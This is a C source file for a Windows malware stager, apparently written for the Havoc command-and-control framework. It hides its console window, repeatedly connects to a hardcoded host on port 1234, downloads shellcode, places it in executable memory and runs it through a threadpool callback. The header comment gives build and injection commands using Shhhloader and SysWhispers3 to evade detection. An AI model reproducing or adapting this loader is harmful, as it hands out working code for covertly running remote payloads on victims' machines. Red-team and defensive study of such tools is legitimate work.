💊💊💊💊

stager.c

/*
** p4p1: http://p4p1.github.io/
** Created on: Wed 02 Aug 2023 01:37:50 PM CEST
** stager.c
** Description:
**  A C stager for havoc.
** Commands for things:
**  ./Shhhloader.py  -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin
**  ./Shhhloader.py -v -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin
**  x86_64-w64-mingw32-gcc net_stager.c -o hidden2.exe -lws2_32
*/

#include <ws2tcpip.h>
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
#define IP_ADDR "192.168.1.104"
#define PORT 1234
#ifdef _32_BIT_
#define demon_x64_bin_len 89088
#else
#define demon_x64_bin_len 97279
#endif

unsigned char data[demon_x64_bin_len];

int retrieve_stager()
{
	WSADATA wsa;
	SOCKET s;
	struct sockaddr_in cleanServer;
	int response_size = 0;

	if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
		return 2;
	if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
		return 2;
	InetPtonA(AF_INET, IP_ADDR, &cleanServer.sin_addr.s_addr);
	cleanServer.sin_family = AF_INET;
	cleanServer.sin_port = htons(PORT);
	if (connect(s, (struct sockaddr*)&cleanServer, sizeof(cleanServer)) < 0)
		return 2;
	if ((response_size = recv(s, (char*)data, demon_x64_bin_len, 0)) == SOCKET_ERROR)
		return 2;
	closesocket(s);
	return 1;
}

int main(void)
{
	PVOID alloc;
	DWORD oldProtect = 0;
	HANDLE cr;
	HANDLE hProcess;
	int ret_val = 2;

	HWND stealth;
	AllocConsole();
	stealth=FindWindowA("ConsoleWindowClass", NULL);
	ShowWindow(stealth, 0);
	while (ret_val == 2) // constantly download stager on error;
		ret_val = retrieve_stager();
	HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
	LPVOID scodeAddress = VirtualAlloc(NULL, sizeof(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	RtlMoveMemory(scodeAddress, data, sizeof(data));
	PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)scodeAddress, NULL, NULL);
	SetThreadpoolWait(threadPoolWait, event, NULL);
	WaitForSingleObject(event, INFINITE);
	return 0;
}